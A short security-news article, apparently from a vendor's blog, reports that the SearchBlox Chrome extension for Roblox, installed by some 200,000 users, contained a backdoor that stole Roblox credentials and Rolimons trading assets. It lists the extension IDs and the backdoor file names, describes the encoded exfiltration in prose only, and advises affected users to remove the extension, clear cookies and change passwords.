HQ/EMEAFind out how we can help your business
The SearchBlox extension is a malicious browser extension installed by over 200,000 Roblox users. Researchers discovered that the extension includes a backdoor that could steal Roblox user credentials and assets on the game’s trading platform dubbed Rolimons.
Based on reports, an extension code indicated the existence of a backdoor, introduced either intentionally by the threat actors or after a compromise. A separate researcher claimed that the extensions on the Chrome Web Store seem to be compromised.
There are also a couple of search results of SearchBlox on Google Chrome. These extensions offer a search feature for Roblox servers that allows users to pick a server without hassle. However, both effects are laden with a backdoor.
The researchers were able to identify both extensions. The first one’s ID is coded as blddohgncmehcepnokognejaaahehncd, and the other one is ccjalhebkdogpobnbdhfpincfeohonni.
The Roblox community was skeptical about the SearchBlox extension.
Some of the Roblox community members were already suspicious of the SearchBlox extension earlier this week. Some members have investigated and discovered that the SearchBlox installers have been backdoored.
These members warned other users that it is better to change their account passwords if they have already installed the extensions.
Another group of researchers have downloaded the Chrome extension to analyse it and found out that the first mentioned ID already have more than 200,000 Roblox players who downloaded the SearchBlox extension.
The second extension has significantly lesser downloads, as it was only downloaded by users 959 times worldwide.
The backdoor within the first identified extension is named content[.]js, and the backdoor is coded as button[.]js for the other extension.
Furthermore, the page for the extensions contained an HTML code that pretended to portray an image through the <img> tag, but instead, it used the “&” and “#” symbols. When decoded by a source, the code yields a hidden code, which further appears to send Roblox user information to another domain.
The code also reviews a player’s account on the game’s trading platform, Rolimons[.]com.
Users who have installed the SearchBlox malicious extensions should remove it immediately, clear their cookies, and change their Roblox account passwords.
